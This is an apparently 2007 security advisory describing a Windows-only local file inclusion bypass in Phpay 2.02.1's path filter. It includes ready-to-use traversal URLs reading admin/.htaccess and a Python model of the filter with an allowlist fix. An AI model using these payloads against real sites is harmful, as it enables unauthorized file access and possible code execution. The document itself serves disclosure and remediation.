th3.r00k.nospam
pork.gmail.com
Date: Fri Dec 14 2007 - 16:03:52 CST
By Michael Brooks
Vulnerability Type: Local File Inclusion
Software: Phpay
Homepage: http://sourceforge.net/projects/phpay/
Version Affected: 2.02.1
Phpay was previously affected by multiple local file include flaws; as a result, the vendor wrote this patch for the user-supplied $config value:
// Vendor patch (Phpay 2.02.1): strips ":" and "/" (and, via a regex, any two
// characters followed by "/") from $config, falls back to config.inc.php unless
// ".inc.php" appears somewhere in the string, then includes "./$config".
// Only forward slashes are removed; the backslash is never touched.
$config = ereg_replace(":","", $config);
$config = trim(ereg_replace("../","", $config));
$config = trim(ereg_replace("/","", $config));
if (($config=="")|| (!eregi(".inc.php",$config))){$config="config.inc.php"; echo "<!--$config-->\n";}
if (!file_exists("$config")) { echo "panic: $config doesn't exist!! Did you backup it after installation? ..."; exit;}
require("./$config");
To bypass this patch, backslashes can be used instead of forward slashes on Windows systems, where the backslash is also a path separator but is not filtered. The only other constraint is that ".inc.php" must exist *somewhere* in the string, so it can simply be placed in a bogus leading directory name.
Local file include (Windows only):
http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\\..\\admin\\.htaccess
or if magic_quotes_gpc is turned on:
http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.htaccess
Remote code execution is reachable from the ./admin/ folder, which is why admin/.htaccess is the file read here.
The admin folder *should* be protected by a .htaccess file, similar to osCommerce 2.
Vulnerable configuration:
There is a call to extract($_GET), so the exploit works regardless of register_globals. Running the application on Linux, where the backslash is not a path separator, is a very good fix for this issue.
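As an added illustration, not part of the original advisory or of Phpay's own code, the following Python models the vendor filter above (PHP's ereg_replace() and eregi() mapped onto Python's re module with the same patterns), shows why the backslash payload from the URLs above passes it untouched, compares what require("./$config") then opens under Windows and POSIX path normalisation, and adds an exact-match allowlist check that would have closed the hole. The function names and the contents of ALLOWED_CONFIGS are assumptions; the payload is the one from the advisory.

```python
import re
import ntpath
import posixpath

# Payload from the advisory's single-backslash URL (constructed test input).
PAYLOAD = r"eregi.inc.php\..\admin\.htaccess"


def phpay_filter(config: str) -> str:
    """Python model of the Phpay 2.02.1 patch.

    ereg_replace() is a regex replace, so "../" means "any two characters
    followed by a slash"; eregi() is a case-insensitive regex search.
    Backslashes are never touched, which is the whole bypass.
    """
    config = re.sub(":", "", config)
    config = re.sub("../", "", config).strip()
    config = re.sub("/", "", config).strip()
    if config == "" or not re.search(".inc.php", config, re.IGNORECASE):
        config = "config.inc.php"
    return config


def resolved_include(config: str, flavour: str) -> str:
    """Path that require("./$config") ends up opening after the filter,
    normalised the way the given OS family does it ("nt" or "posix").

    On Windows "eregi.inc.php" is a non-existent directory that "\\.." steps
    back out of, leaving admin\\.htaccess; on POSIX the backslashes are just
    characters in one (non-existent) filename.
    """
    mod = ntpath if flavour == "nt" else posixpath
    return mod.normpath("./" + phpay_filter(config))


# Hardened replacement (assumed allowlist): compare against exact file names.
# No stripping or normalising, so there is no second encoding to slip past.
ALLOWED_CONFIGS = frozenset({"config.inc.php"})


def hardened_config(config: str) -> str:
    """Return the requested config only if it is an allowlisted name."""
    return config if config in ALLOWED_CONFIGS else "config.inc.php"


if __name__ == "__main__":
    print("after filter :", phpay_filter(PAYLOAD))
    print("Windows opens:", resolved_include(PAYLOAD, "nt"))
    print("Linux opens  :", resolved_include(PAYLOAD, "posix"))
    print("hardened     :", hardened_config(PAYLOAD))
```

The forward-slash form of the same traversal ("../admin/.htaccess") is mangled by the filter and falls back to config.inc.php, so the patch does work for the encoding its author tested; the allowlist avoids the problem entirely by never trying to sanitise a path and instead refusing anything that is not a known file name.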
Merry Christmas